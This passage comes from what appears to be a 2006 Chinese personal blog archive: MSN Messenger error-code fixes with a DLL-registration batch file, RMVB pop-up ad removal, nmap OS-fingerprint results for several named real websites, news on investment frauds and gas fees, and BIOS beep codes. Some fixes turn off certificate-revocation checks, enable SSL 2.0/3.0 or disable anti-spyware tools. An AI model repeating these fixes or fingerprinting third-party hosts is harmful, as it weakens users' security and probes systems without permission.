並且到進階標籤的 [安全性]區域確認[檢查伺服器憑證是否被撤銷 (需要重新啟動)] 沒有勾選
而 [使用 SSL 2.0] 和 [使用 SSL 3.0] 都有勾選。 (請看圖片B)
開始->執行->打入cmd 輸入「ipconfig /flushdns」後再按一下 ENTER
------------------------------------------------------------------------------------------------
81000303 刪除暫存的網際網路檔案和 Cookies(看圖片C)
如果相同的問題繼續出現, 請稍後再重新登入
------------------------------------------------------------------------------------------------
81000362 在IE的檔案功能表上，請確定 [離線工作] 沒有被選取
------------------------------------------------------------------------------------------------
80070190 請到[檢查用]看看是否微系統穩定執行訊息, 然後執行圖片A的動作
------------------------------------------------------------------------------------------------
81000314 伺服器目前無法連線, 等會在嘗試
------------------------------------------------------------------------------------------------
81000359 你的帳號並沒有被認證
------------------------------------------------------------------------------------------------
81000364 被防火牆阻擋
------------------------------------------------------------------------------------------------
81000377 伺服器有問題(別對你電腦亂動東西= =||)
81000395
------------------------------------------------------------------------------------------------
81000378 聯絡人清單有問題(此為伺服器部分問題)
------------------------------------------------------------------------------------------------
8100038d 密碼大小寫有問題
------------------------------------------------------------------------------------------------
81000394 你忘記輸入密碼
------------------------------------------------------------------------------------------------
80004005 請下載檔案A並執行
如果不成功請重新安裝MSN
還是不行就請重新安裝IE
XP安裝指令:
開始->執行->打入rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 %windir%infie.inf並且按確定
------------------------------------------------------------------------------------------------
80048848 軟體防火牆阻擋, 網路無法連線
------------------------------------------------------------------------------------------------
80070190 Proxy無法讓MSN連線, 關掉Proxy選項(網際網路選項)
------------------------------------------------------------------------------------------------
80070193 伺服器不允許你的proxy連線, 關掉proxy並確認伺服器是否運作正常(利用檢查用之連結)

另類無法登錄之解決辦法:
方法1:
C:Documents and Settings[你的電腦使用者名稱]Application DataMicrosoftMSN Messenger 把內部的資料夾刪除

方法2:
開始->執行
打入
regsvr32 softpub.dll
regsvr32 mssip32.dll
regsvr32 initpki.dll <~ 這個會執行比較久(真的很久= =), 有的人會查無此檔(因為盜版的windows的關係)

方法3: 請確認你打入的帳號是否大小寫打錯

無法安裝解決辦法:
錯誤碼1601
開始->執行
打入Msiexec /unregserver
然後下载InstMsiW.exe(Office光碟片內部有)
再次開始->執行打入msiexec.exe /regserver

錯誤碼:1603
關閉所有間諜軟體偵測程式
重新執行 MSN Messenger 安裝

============================================
檔案區:
============================================
檔案A
http://www.msn-problems.com/downloads/register-messenger-dll-files.bat

@ECHO OFF

ECHO.

ECHO *****************************************************************

ECHO * This file is provided by imzers.com *

ECHO * Copyright (C) 2004-2006 *

ECHO *****************************************************************

ECHO.

ECHO Please wait a few minutes while registering DLL files needed by MSN Messenger..

REM Following files only needed in windows XP

IF NOT "%os%"=="Windows_NT" GOTO WIN9X

regsvr32 Dssenh.dll /s

regsvr32 Gpkcsp.dll /s

regsvr32 Slbcsp.dll /s

regsvr32 Sccbase.dll /s

:WIN9X

IF NOT "%os%"=="Windows_NT" CD %windir%System

REM Needed by both XP and 9X

regsvr32 Softpub.dll /s

regsvr32 Wintrust.dll /s

regsvr32 Initpki.dll /s

regsvr32 Rsaenh.dll /s

regsvr32 Mssip32.dll /s

regsvr32 Cryptdlg.dll /s

regsvr32 Msxml3.dll /s

ECHO.

ECHO DLL files registered, Messenger should now function again!

ECHO You can ask for help on the forum at www.imzers.com

ECHO if Messenger still doesn't connect.

ECHO.

pause

exit

============================================
連結區:
============================================
http://messenger.msn.com/Status.aspx

RMVB 網站廣告移除方法:

2006-07-07T21:52:00.000-07:00

RMVB 網站廣告移除方法:
在播放一些從網上下載的RMVB檔時，放著放著就會打開一個網頁，而且每次放到這個地方就會自動打開網頁，很麻煩。其實這是別人做廣告的一個方法，他們把網頁資料保存在Real檔的剪輯資訊中就會這樣了，我們只要去掉剪輯資訊中的網頁資料就可以解決這個問題了。

方法一：

　　首先要下載軟體“Helix Producer Plus”，下載後進行安裝，軟體默認是安裝在“C:\Program Files\Real\Helix Producer Plus”下的。

　　安裝好找到要去除網頁的RMVB檔（如input.rmvb），在旁邊新建一個空白的文字檔案（如event.txt），接著再新建一個批次檔案（如abc.bat），並在裏面輸入如下內容：

　　"C:\Program Files\Real\Helix Producer Plus\RealMediaEditor\rmevents.exe" -i input.rmvb -e event.txt -o output.rmvb

　　其中input.rmvb是要進行處理的檔，event.txt是編輯剪輯資訊的檔，output.rmvb表示處理後正常的RMVB檔。

　　檔建立好後，就可以來運行批次檔案abc.bat，這時就會生成一個output.rmvb的視頻檔，它就是已經去除自動打開網頁的檔。

網站廣告原理：

可以在影片中添加事件(events)是rm檔的特性之一。用戶可以安裝 RealProducer Plus (Realnetworks的官方產品之一) 來對rm檔進行編輯、製作、修改。其安裝目錄下的 RealMediaEditor/rmevents.exe 可執行檔正是用來為rm檔插入事件的命令行程式。

你可以任意新建一個文字檔案，比如myevents.txt，檔內容如下：

u 00:00:08.0 00:00:20.0 &&_rpexternal&&http://www.xxxx.net/

其中，
u 是事件標誌(Flag)，表示要在檔中插入的是一個url位址，
第2,第三個欄位分別表示起止時間點，單位格式是小時:分:秒.毫秒
最後一個欄位是你要彈出的url的位址 ,
_rpexternal 參數表示在外部流覽器打開url,
而不是使用realplayer內嵌的流覽器。

保存之後打開命令行視窗，cd到 {RealProducer安裝目錄}/RealMediaEditor 子目錄，執行以下命令：

rmevents -i D:\MovieOriginal.rm -e D:\myevents.txt -o D:\movieWithPopup.rm

執行完成之後用播放器播放處理之後的movieWithPopup.rm檔，當播放到第8秒或者你拖動進度條至8-20秒之間的任一位置，都會彈出一個視窗來。

知道了彈出視窗的原理，要把惡意rm文件的惡意代碼給去掉也很簡單了。你只要新建一個完全空白的myevents.txt文字檔案，然後重新執行上面的命令行就可以把指定rm檔中的所有事件都清除乾淨。

不過要注意的是，rm事件中除了可以彈出視窗之外，還可以用 i 標誌來為剪輯添加一些說明資訊或標題。執行上述命令之後所有的標題資訊可能也會一併去除。但一般來說我們看rm電影不太會去關心這些剪輯標題資訊（何況大部分的標題資訊都是些網站的廣告之類），因此關係不大。

完整的rmevents命令行的使用方法，可以參見安裝目錄下help目錄幫助文檔。

msn space 照片無法上傳解決方法:

2006-07-07T21:10:00.000-07:00

msn space 照片無法上傳解決方法:

MSN 照片上載控制項的下載位址： http://spaces.msn.com/PhotoUpload/MsnPUpld.cab ...

Step 1,用Winrar打開這個壓縮包MsnPUpld.cab（MsnPUpld.rar），

解壓縮到C:\windows\system32\ (win2000應該是c:\winnt\system32\),

看到有3個文件：MsnPUpld.dll，MSNPupld.inf，PURen-us.dll

Step2右鍵點擊"MSNPupld.inf"會看到"安裝"，點擊安裝這個檔
Step3 註冊MsnPUpld.dll和PURen-us.dll
註冊步驟如下：
1,開始〉運行〉然後輸入CMD
2,輸入regsvr32 c:\windows\system32\MsnPUpld.dll;提示註冊成功!
3,輸入regsvr32 c:\windows\system32\PURen-us.dll;提示註冊成功!

某些電腦會提示"沒找到DLLRgisterServer輸入點．無法註冊檔。"不用管它
直到註冊成功

##

for all the people that kept trying this insane instructions, like
turning off everything (Pop up Blocker and Norton Security), or the changes
in the Security Tab settings on the Tools menu on the Explorer, I did them
all and it doesn't work...
Here is what it worked for me:

I turned PopUp Blocker off, then I restart the computer, and before the
computer starts to boot, press F8 to enter the System Recovery Menu.
Choose Safe mode with Networking... then Windows XP (not Recovery Console)
to boot with the GUI.
When we get to the Windows Desktop, start Internet Explorer, verify PopUp
blocker is off and create an Album on MSN Photo.
It will pop up a window with the "famous" Install MSN Photo. When you click
on it it will show a yellow banner line on the top of the page asking if you
still want to install the ActiveX Control... Do a right click and choose to
install it...
Now you will see your pictures folders of your computer...
You can restart the computer normally, and the control will be installed
again...
Don't forget to Turn on the PopUp blocker again...
Hope everybody find this useful...

http://www.microsoft.com/communities/newsgroups/en-us/default.aspx?dg=microsoft.public.msn.discussion&tid=8c9d82e3-b63a-4bad-934b-9d044f8b8d9a&p=1

Update for MSN Spaces users who are not able to Add Photos

Many MSN Spaces customers are currently experiencing problems when trying to add photos to their MSN Space. When they click on the "Add Photos…" link, a new window should open but nothing happens.

Add spaces.msn.com to list of sites where Pop-ups are allowed in Internet Explorer

In IE6, select Tools > Pop-up Blocker > Pop-up Blocker Settings
Add spaces.msn.com to "Address of Web site to allow" and click "Add"
Click "Close"

Check Norton Internet Security Settings

Customers who have Norton Internet Security 2005 will need to disable the "Ad Blocker"
Customers who have Norton Internet Security 2006 will need to disable the "Pop-up Blocker"

For more information on how to disable these functions on Norton Internet Security, please visit the Symantec website ( www.symantec.com) and in the Search Box, put in this Document ID Number: 2003082718220036 and click on Go.

Many customers have installed toolbars from MSN or other companies. Make sure to add spaces.msn.com to the list of websites where pop-ups are allowed for these toolbar programs. You may need to refer to your toolbar help for instruction on how to do this.

http://thespacecraft.spaces.msn.com/blog/cns!8AA773FE0A12B9E3!7472.entry?_c11_blogpart_blogpart=blogview&_c=blogpart

colorbar

2006-06-26T23:28:00.000-07:00

os fingerprint

2006-06-18T00:57:00.000-07:00

os fingerprint

#

nmap(client side)

http://www.insecure.org/nmap/

http://www.winpcap.org/

p0f (server side)

http://lcamtuf.coredump.cx/p0f.shtml

#

www.xuite.net

Running: Cisco IOS 12.X, WatchGuard embedded
OS details: Cisco 837 router running IOS 12.3(8)T, WatchGuard Firebox X700

tw.yahoo.com

Running: FreeBSD 5.X
OS details: FreeBSD 5.2.1 (SPARC), FreeBSD 5.4-RELEASE

ptt.cc

Running: Linux 2.4.X|2.6.X
OS details: Linux 2.4.18 - 2.4.27, Linux 2.4.21 (Suse, X86), Linux 2.4.22, Linux
2.4.6 - 2.4.26 or 2.6.9, Linux 2.6.10, Linux 2.6.5 - 2.6.11, Linux 2.6.7, Linux
2.6.8 (Debian)

直接將 WMA、MP3、OGG 燒錄成音樂 CD

2006-06-17T07:50:00.000-07:00

直接將 WMA、MP3、OGG 燒錄成音樂 CD

軟體名稱：Easy Audio CD Maker

授權類型：共享軟體
支援語系：英文
官方網站：http://www.guangmingsoft.com/
檔案下載：http://www.guangmingsoft.net/mp3work/Mp3WorkSetup.exe

軟體簡介： Easy Audio CD Maker 是專門用來燒錄音樂 CD 的工具，主要特色如下。
直接將 WMA、MP3、OGG 燒錄成音樂 CD。
內建多媒體播放軟體。
可將 WMA、MP3、OGG 批次轉換成 WAV。
製作 CD 封面。
支援 Meta Tags 以及自動變更檔名。

女保險員詐保費落跑　中縣市數十保戶被騙損失千萬

2006-06-14T18:41:00.000-07:00

女保險員詐保費落跑　中縣市數十保戶被騙損失千萬　

台中市傳出有保險業務員詐騙()千萬元保費潛逃，保戶控訴保險公司刻意隱瞞業務員行為，甚至對他們不理不睬不賠償，但保險公司表示，保戶把錢轉到業務員私人帳戶，屬於個人借貸，公司不負責。

會議桌右手邊身材微胖中長髮的婦人，就是被保戶指控的陳姓保險員，今年初她拿著1張投資儲蓄型保單，利用高投資率當誘餌，招攬客戶投資上千萬。

受害保戶丁先生：她說投保比定存還要好，還可以隨時停止保險。

受害保戶劉先生：騙她媽媽250萬，還有她叔叔嬸嬸還有堂妹，騙了差不多1千多萬。

受害保戶陳小姐：她竟然把我這些錢拿走，我一直找她，保險公司為什麼都不出來解決，我氣的就是這一點。

算一算，在台中市光是3個人就被騙走1676萬，台中縣也有20多個人損失至少3000萬。

保戶不滿保險公司不願意賠償他們的損失，集體出面控訴，保險公司卻說他們也是受害者。

保險公司秘書課主任蘇壁雄說：「(陳姓保險員)將款項匯到私人帳戶，按照一般的投保規則規定，款項應該匯到公司的帳戶，消保官認為，以目前的狀況沒辦法認定(損失)是保險公司要負責的。」

不只這名女保險員失去聯絡，就連她的丈夫和兩名子女都找不到人，保戶投訴無門，急得像熱鍋上的螞蟻，向媒體曝光保險員的照片，請她趕緊出面，歸還保戶的血汗錢。

小女子玩高招各匯1元毀詐騙集團4人頭戶

2006-06-14T18:10:00.000-07:00

小女子玩高招各匯1元毀詐騙集團4人頭戶　

／基隆報導基隆市潘姓婦人，在七個月內接連利用一元摧毀四個詐騙帳戶，她表示，時局紛亂，周遭太多親友受騙，身為一個小市民，只能利用一塊錢，來消滅詐騙集團的人頭帳戶。她建議，接到歹徒電話，虛與委蛇，假裝上當不用急著掛電話。

小兵立大功警方擬表揚

住在安樂區的潘姓婦人（四十一歲），接連破壞利用一元摧毀歹徒帳戶，已成為基隆市警局刑警大隊的常客，默默地投入打擊詐騙集團行列，偵四隊長黃垂郎將建議警局表揚。潘婦大學畢業，為全職家庭主婦，她認為，時局雖然太亂，但小市民不必氣餒，還是有很多事情可以做。

潘婦說出和詐騙集團周旋的過程，「其實，第一次和詐騙集團成員對話時，心裡會有點緊張，不過，我告訴自己要沈著點，套出詐騙集團人頭帳戶的號碼後，我就趕緊到郵局匯款，接著就拿著匯款單向警方報案。」

每個人頭戶3000元歹徒蝕本

第一次成功地讓詐騙集團人頭帳戶「破功」後，心裡充滿了成就感，心想，歹徒收購人頭帳戶，至少花費三千元，可以耗費歹徒成本。

之後，反而天天期待接到詐騙集團的來電，第二次接獲電話後，心情更為篤定，虛與委蛇，裝傻被騙，套出歹徒帳戶，立即前往警方報案，先後協助警方「消滅」了四個詐騙集團的人頭帳戶。前兩次皆為假中獎的電話，而最後一次為假冒中華電信電話費催繳，手法過程雷同。

有了多次經驗，潘婦建議民眾，在接到詐騙集團來電、簡訊或是中獎通知時，別急著掛上電話，置之不理，可以假裝聽信對方，最終目的套出帳戶，可依照歹徒指示，到郵局、銀行等金融機構匯出一塊錢，填妥匯款單，加上手續費用卅元，再向警方報案，只要區區一塊錢，就可以消滅詐騙集團的人頭帳戶，斷絕一條歹徒為害的通路，也是功德一件。

vdsp ldf out of memory fix:

2006-05-09T01:51:00.000-07:00

vdsp ldf out of memory fix:

sample problem:

[Error li1040] "libmpeg2.ldf":450 Out of memory in output section 'l1_code' in processor 'P0'
Total of 0x7b2 word(s) were not mapped.
For more details, see 'linker_log.xml' in the output directory.

solution:

If u are using vdsp++ 4.0 then in ur [project options] use

-MDUSE_SDRAM flag to the linker at link time.

瓦斯費新制劫貧濟富

2006-04-22T01:57:00.000-07:00

瓦斯費新制劫貧濟富

瓦斯業者統計「前十大高用戶」，發現瓦斯費新制實施後，用量大的企業戶平均每個月可以少繳3至20萬元，總共每月少繳62萬餘元，但是一般家庭用戶每個月卻要增加支出38至40元，台北市約有6成以上民眾的瓦斯費會因此變相漲價，所以新制被譏為「劫貧濟富」的制度，肥了財團卻苦了老百姓。

企業少繳家庭支出卻上揚

瓦斯新制（包含查詢費率與瓦斯表退費）服務電話：大台北瓦斯27684999轉9，或27691212轉9；陽明山瓦斯28948686轉102；欣湖天然氣27913491轉113；欣欣天然氣29218823。

建設局表示，經濟部能源局邀集專家學者討論後的計算公式，包括大台北瓦斯、陽明山瓦斯、欣湖天然氣、欣欣天然氣調整新費率後每度為12.71、13.57、13.45以及13.92元，85萬用戶每月會增加38元。

但是，台北地區40度以上的高用戶瓦斯費會隨著用氣量增加而支出減少，平均每增加1度就會減少1元左右，等於把一般家庭用戶增加的支出拿去補貼高用戶，大台北瓦斯公司表示，轄內的高用戶佔3%，但是用氣量卻佔48%，其中台大醫院是排行第一的大客戶，過去每個月瓦斯費要繳250萬餘元，採取新制後每月卻可以省17萬餘元。

陽明山瓦斯公司也表示，轄內的高用戶屬新光醫院，每個月瓦斯用量約10萬度不等，採新制後，每月可省約10萬元；欣欣天然氣公司轄內的高用戶某印刷廠，每月也可省下3萬元；但相對的，一般4人的家庭用戶，每個月卻增加支出38元。

--------------------------------------------------------------------------------

變相鼓勵浪費能源

瓦斯費新制才上路12天，卻出現許多爭議與瑕疵，包括新制費率對高用戶有利、瓦斯表退費不便民，在在顯示該新制必須檢討修正。

一般而言，能源並非取之不盡、用之不竭，政府制定能源政策時多半鼓勵節省為要，包括水、電等費率，只要是高量用戶，費率都會提高，遠大於一般家用戶，但是天然氣瓦斯費率卻反其道而行，用量越高價格竟然越便宜，根本就是變相鼓勵民眾浪費能源。

根據中華民國公用瓦斯協會資料顯示，新制實施後，台北地區約有60%以上的用戶會增加支出，嘉義地區也有82%的用戶會增加支出，桃園地區則有50%以上的用戶會增加支出，然而綜觀繳得起瓦斯費的財團企業，卻紛紛節省上百萬元的瓦斯費用，難怪瓦斯業者大喊「劫貧濟富」！

另外，能源局制定的瓦斯表保證金退費程序，雖符合民法規定，實際上卻不便民，能源局認為保證金一定要退給原申請戶，但許多房屋轉手多次，早就找不到原申請戶。

光台北市瓦斯表退費就高達21億元，牽涉範圍廣大不容小覷，原本能源局以為利多的方案，現在保證金如何順利退費，卻演變成瓦斯業者與民眾頭痛的麻煩事，假如不及早提出因應方案，退費糾紛只會越演越烈。

免費打市話1分鐘(打手機要付費)

2006-04-22T01:24:00.000-07:00

免費打市話1分鐘(打手機要付費)

http://www.voipbuster.com/en/download.html

怕老婆的站左邊　　不怕老婆的站右邊

2006-04-06T21:34:00.000-07:00

怕老婆的站左邊　　不怕老婆的站右邊

有一個ＸＸ公司集團　　裡面的大臣幾乎都很怕老婆
有一個晚會
題目是怕老婆的站左邊　　不怕老婆的站右邊
結果左邊都擠滿了人　　右邊卻有２個人
主持人：哇塞！你們兩居然不怕老婆
大家給他們鼓鼓掌！我們來訪問第一位
妳為什麼不怕老婆
他說：我老婆說凡事都要經過他的同意才能做決定
而我正要打電話問　誰知那裡人太多　　擠不進去　看到這兒有空位我才站這兒的
大家：......
主持人：那你呢？
他說：我老婆說　人多的地方不可以站！
大家：......

電腦按開機鍵時的異常逼逼聲,分別表示如下

2006-04-06T19:13:00.000-07:00

電腦按開機鍵時的異常逼逼聲,分別表示如下
AWARD BIOS
1短 : 系統啟動正常
2短 : COMS設定錯誤
1長1短 : 記憶體或主機板錯誤
1長2短 : 螢幕或顯示卡錯誤
1長3短 : 鍵盤錯誤
1長9短 : BIOS記憶體錯誤
連續逼聲 : 顯示卡未插好
連續急短音: 電源有問題

AMI BIOS
1短 : 記憶體刷新錯誤
2短 : 記憶體ECC檢查錯誤
3短 : 基本64K記憶體檢查錯誤
4短 : 系統時間錯誤
5短 : CPU錯誤
6短 : Gate A20錯誤
7短 : CPU 中斷錯誤
8短 : 顯示卡記憶體錯誤
9短 : ROM錯誤
10短 : CMOS讀寫錯誤
11短 : 快取記憶體錯誤

真富翁與假富翁

2006-03-10T18:21:00.000-08:00

真富翁與假富翁

古話說：「知人知面不知心，畫虎畫皮難畫骨。」一句話道盡窮人與有錢人的微妙關係：窮人的生活壓力太大，便一直想獲得紓解，只要賺到一點小錢，就想學有錢人一樣擺闊，希望身邊朋友也把他當成有錢人一樣尊重。這裡面至少反映出兩個問題，其一是「我們對財富的渴望」，其二我們「內心的自悲」與對「被尊重」的渴望。

財富壓力的生死輪迴

窮人在努力工作一段期間後，財務變充實了，壓力隨之減輕，突然發現動力打折了，為了逼自己依然像以前一般努力，趕快又把賺來的錢花掉，目的是希望透過花錢之後的匱乏感覺，讓自己壓力更大，產生更大的動力，美其名叫「創造良性負債」，其實是無止境的財富壓力輪迴，只是不斷的折磨自己而已。這種模仿富翁的行為，叫「假富翁」。他並不是真正富有，只是有點小錢就想裝有錢，可以學「有錢人」一樣花錢耍闊，體驗當「富翁」的快感！可是花錢以後卻發現，財富卻變得更空虛了。

真正有錢人的花費，是財富累積到相當程度後，每月賺進來的錢就很多，怎麼花都花不完，這是真正的富翁。那假富翁呢，只是表面好看，其實負債一大堆，這是多麼可悲的情況。模仿有錢人花錢很簡單，但要學習有錢人一樣賺錢卻很困難。所以我們發現窮人跟有錢人，在真實運作裡，確實有很多值得我們探討的地方。

對「富有」的渴望與模仿

先從對財富的渴望來看，我們渴望的是獲得無拘無束的生活，不要被金錢所困擾，所以賺到錢後，第一個就想要紓解一下，及時行樂就是「對財富的渴望」。我們只知道有錢人日子好過，所以想要跟有錢人學，可惜學得到表面（花錢很大方的那一面）卻無法理解有錢人並不是隨時都在花錢耍闊，他們也有非常節儉的一面。通常我們看到有錢人在花錢時是在做交際，他們只有在這個時候花錢，其他時刻都非常勤儉。

國內知名企業的領導人像郭台銘、施振榮、王永慶……等人，都不是很喜歡揮霍的人。我們都知道這些富豪們有非常節儉的一面，即使已經成就很大的事業，依然過著勤儉的生活。可是窮人卻不知道，窮人只看到他們偶爾出手的那一次非常大方，就想學習他們花錢，結果花錢的速度甚至比有錢人還更快。

學習有錢人的本事

其實有錢人真正的本事不在花錢，而在賺錢。到底如何賺錢，這就不是從表面上能看得到的，所以學到人家花錢，卻無法像有錢人一樣賺錢，造成在窮人的世界裡面，沒多久又把辛苦賺來的錢花完了，這是多麼可惜的事啊！其實有錢人並不希望別人知道他很有錢，所以行動都非常低調，他們不喜歡在別人面前擺闊，但窮人卻不會知道。

從自尊心的角度來看，這完全是「自悲感」的心理作祟，只要獲得些許財富，就希望得到大家的認同，能對他另眼相看，所以造成他毫無節制的花錢，總希望這樣就能得到別人的認同。這再次驗證了窮人平常忍受著貧窮生活，內心其實充滿壓抑，忿忿不平的渴望立刻擺脫，隨時都渴望紓解貧窮的壓力。

至於所謂「安貧樂道、恬淡寡欲」的生活，那是平常不敢奢望有錢，才會不斷的約束自己、壓抑自己；可惜壓抑解決不了心中的苦悶，只要哪天發些小財，這時候長期壓抑造成的內心不平，剎那間如同黃河決堤般完全宣洩而出。所以只要稍微有錢，就馬上變成揮霍無度，這是窮人的可悲。

用無知的偏見臆測未來，造成更大的悲劇

如同學校教育一般，財富生涯也可以階段性的規劃！從小學生開始學習正確的財富知識，接著在國、高中時代研究各種理財模式，才能進入大人的「財富世界」，逐夢踏實。財富教育不是在鼓勵花錢，甚至很多花錢行為是非常危險的，從貧窮社會進入富裕社會，從「無知」到「有知」的領域，絕對不能憑空想像！

吸金四十億害三萬人全面搜捕阜東集團【2006/3/8】

2006-03-08T22:35:00.000-08:00

吸金四十億害三萬人全面搜捕阜東集團【2006/3/8】

調查局北機組昨天偵破近十年來國內最大的吸金案，把前「阜東集團」首腦陳育珅和遍及全國旗下的投顧公司負責人等十一人分別拘捕和約談到案。調查單位保守估計，詐騙金額高達四十億元，受害民眾也多達三、四萬人之多...

台南地檢署指揮北機組、中機組及高雄、台南、台東等地調查站，同步搜索阜東集團全台據點共十六處，南檢指出，負責人陳育珅於民國九十一年經營阜東集團，在全台各地違法吸金及炒股票，隔年遭雲林地檢署起訴，但陳育珅變本加厲，操控阜東集團的決策及資金，經營十家投資顧問公司，且在全台各地設立吸金據點，以類似老鼠會的組織架構吸金，大量吸收業務員招攬投資人資金。南檢表示，阜東各地投顧公司在各地舉辦投資說明會，吸取之資金幾乎全無作帳，並以人頭帳戶交匯旗下會計，作為非法吸金及洗錢之用，並以msn、聊天室等散播虛偽獲利消息，佯稱期滿自行為投資人轉單其他股票，繼續操作。事實上所吸收之資金，均進入陳育珅集團口袋。且為敷衍投資人之退款要求，以荒謬理由欺騙投資人表示，第一市場之資金集團將『鎖單』1年，期滿後進行結算，保證可獲利50%，全台受害人數達三、四萬人，吸金超過四十億元；目前，陳育珅相關人等全被帶往北機組偵訊。

乩童陳育珅吸金逾百億　受害者到立法院陳情

2003/06/19 20:21

<>一個乩童竟然只用短短一年的時間就吸金一百多億，這咁有可能？！上百名南投鄉親到立法院哭訴陳情，陳情人說，阜東集團負責人陳育珅以乩童身分做掩護，騙了他們的老本，而這名假企業家政商關係良好。

上百名南投鄉親，今天(2003/06/19)坐遊覽車到立法院，但他們不是來遊覽的，而是要來討公道，因為他們的老本全交給阜東集團的負責人陳育珅，卻血本無歸。事實上，陳育珅只是個乩童，他的年紀很輕，而且自稱羅王爺，雖然學歷不高，但卻為利用宗教力量，以及政商關係做掩護，短短一年，在全國各地吸金上百億。

今年(2003)1月檢方搜索阜東集團，陳育珅竟然只以2百萬交保，自己的錢要不回來，還聽說他在外頭繼續吸金鄉親忿恨難平，要求檢方停止交保，也呼籲大家，不要再上當受騙。

#

#

陳育珅吸金「神」乎奇技

廿七歲的陳育珅，從小就有發財夢，深諳人性貪婪弱點
，並巧妙利用宗教包裝自己使之神格化，並籌組阜東世
紀集團，一年內吸金百億元，如今東窗事發受害者上千
人。本名陳熙官的陳育珅，祖父陳清在曾任褒忠鄉農會
總幹事，當年從日本引進蘆筍在雲林推廣種植，曾為窮
鄉僻壤的雲林帶來榮景，唯好景不常，最後因生產過剩
，家道中落，陳育珅與父親黯然離開雲林，當時他僅就
讀國小四年級。祖父的失敗，讓陳育珅從小有著「在那
裡跌倒，就從那裡爬起」的念頭；喬治商職畢業後，擔
任一家證券公司董事長的司機，讓他比同年齡的同儕，
更了解金錢遊戲的真面目，於是十幾年前鴻源吸金的例
子，讓他浮起在家鄉─褒忠鄉如法炮製，借以「東山再
起」的機會。為取得投資者認同，他不但將自己「神格
化」自喻為「羅王爺」外，還定時在台北士林一帶起乩
，為人看風水，讓外界信以為真他即是「羅王爺」的化
身，進而展開其無往不利的吸金大法。阜東世紀集團吸
金逐漸闖出名號後，陳育珅開始包裝形象，資助雲林縣
政府舉辦「蝴蝶夫人」歌劇，贊助母校褒忠國小電腦設
備；他經常利用各種婚喪喜慶場合週旋在黑白兩道之間
，結交藍綠政界友人，為集團及本身增加一層防護牆，
讓投資人信任他有辦法，再將錢投資阜東。陳育珅深研
「孫子兵法」，為有效掌控集團幹部與外圍份子，他刻
意製造矛盾與利害衝突，讓底下的協理、區域經理聽從
其指揮，利誘投資者以買賣斷頭股票為由、高利息為餌
違法吸金，短短一年多即吸金百億多元。有了錢的陳育
珅出門有保鑣隨扈，褒忠鄉的「羅王居」住所更是美倫
美奐，成為地方地標，他還為自己購買一艘遊艇，生活
極盡奢華。陳育珅眼見阜東樓起樓塌，雖有意一肩挑起
所有的責任，但虧空的資金高達二、三十億元，顯然已
非他想負責便能了事的。

卡奴自己又負了什麼責任？

2006-03-07T22:58:00.000-08:00

卡奴自己又負了什麼責任？

筆者十四歲的外甥女兒回家說:「我們班同學都覺得當卡奴沒什麼不好，可以買很多名牌，
然後上電視哭一哭說不定就不用還錢了，反正大家都在幫卡奴想辦法。」聽聽，
這是下一代卡奴說的話。當各立委、民意代表、理財專家一面倒地幫卡奴出聲時，
可曾想過奉公守法市井小民的心情？卡奴的負面教育還要繼續下去嗎？

筆者的月薪六萬五千元，每個月在貸款、生活費中量入為出，從來不敢欠過信用卡公司一塊錢。
我們每個週末到大賣場都盡量挑特價促銷品，百貨公司沒有打折絕不敢買，
工作近十年連一個名牌包包都沒有買過，我並不是沒有慾望，而是在我的能力範圍內很辛苦地克制自己。

反觀在電視新聞中泣訴的卡奴小姐，臉上掛著上萬元的古馳鏡框、
手上拎著比我一個月薪水還高貴的LV提包，口口聲聲她活不下去、看不到明天，
要求銀行寬貸、政策救命。她憑什麼？我們的心中只有一句話：妳憑什麼？
妳又願意付出什麼來得到這些救援？是獻身公益？還是義務勞動？

社會幫了卡奴，卡奴們要付出什麼來換？

社會上有很多經濟弱勢者，像失業的單親父母、繳不起營養午餐錢的偏遠地區兒童，
他們都得不到社會資源的妥善照顧，筆者不明白這些卡奴憑什麼在享受奢華生活以後，
竟然厚顏無恥要求社會資源協助？

當他們佔用大量媒體曝光、煩擾許多財經專家出面研商時，正是變相在消費高昂的社會成本，
但卡奴們自身又付出了什麼代價？

卡奴原本就是相對沒有責任感的一群人，如今他們在享受原本就不屬於自己的繁華富貴以後，
反過來可憐兮兮地要求銀行、政府為其善後，依然不需為自己的行為負責任，
未來難道不會出現更多的卡奴嗎？

我們的義務教育中對於理財、稅法等生活教育極度貧乏，很多大學生連基礎的財務知識都不具備，
再加上社會風氣盡是向錢看，也難怪年輕不懂事的卡奴越來越多，
一出社會就累積了完全無力償還的巨額債務。

既然卡奴風暴已經形成，國、高中學校正應該藉此機會，教導學生基本理財知識和正確的理財觀念，

#

XPACK dos可執行檔壓縮程式，

2006-02-25T18:15:00.000-08:00

XPACK dos可執行檔壓縮程式，

這個壓縮程式可以壓縮 DOS 下大部分的執行檔（EXE/COM/SYS）。

壓縮程式的功能在於減少程式在硬碟的空間。

因為，壓縮能使他們檔案的長度變小, 所以可以加快程式執行時
由磁碟片載入系統的速度。

壓縮過的執行檔可在壓縮狀態下直接執行（執行前自動在記憶體內解壓縮)，使用者不須要加上額外的解壓縮動作(也不需要常駐程式的輔助)。

當然，程式執行還是跟未壓縮前一樣, 您將感覺不到和原程式有任何差異。

XPACK 也可用來製作磁片壓縮鏡映檔(compressed diskette image)以便利
電子傳送。您可使用數據機(modem)透過一般電話線或任何其他電子網路
來傳送此磁片壓縮鏡映檔。或用來備份此磁片壓縮鏡映檔至硬碟或
磁帶(tapes)。如此可以確保磁片的內容與原來相同 -- 包含所有目錄結構,
及所有檔案目錄的日期與時間記錄。同時也可用來備份可開機(bootable)的磁片。

XPACK 可在記憶體常駐直接對一般資料檔案解壓縮(XPACK 線上解壓縮系統), 可讓您直接存取壓縮過的一般檔案。
這是由攔截 DOS 中斷呼叫來完成, 允許應用程式跟未壓縮前一樣的讀取壓縮過的
一般檔案。只要在 AUTOEXEC.BAT 中加入一道指令(XPACK -z)來載入 XPACK 線上解壓縮系統, 然後就 OK 啦! :)

xpack也可使用-ux參數(XPACK -ux )來解壓縮一些高階語言編譯器(Borland Pascal 7.X, Turbo Pascal ver 6, Turbo/Borland C ++, MicroSoft QBasic/C ,WatCom C ++ 16 bit, Symantec/Zortech C)所產生的應用程式,不論這些應用程式經過任何壓縮程式的處理。

XPACK 線上解壓縮系統的記憶體常駐部份須要使用 4KB 的上層記憶體
(Upper memory) 及 32KB 的擴展記憶體 (EMS memory)。

程式全部使用x86 assembly(兩萬多行(21796)的組語)寫成,

xpack核心的部分由荷蘭的 feldmann (http://www.xs4all.nl/~feldmann)

做了最佳化處理,透過x86指令順序重排等方式,

加強xpack核心在x86 pipeline 的執行效率。

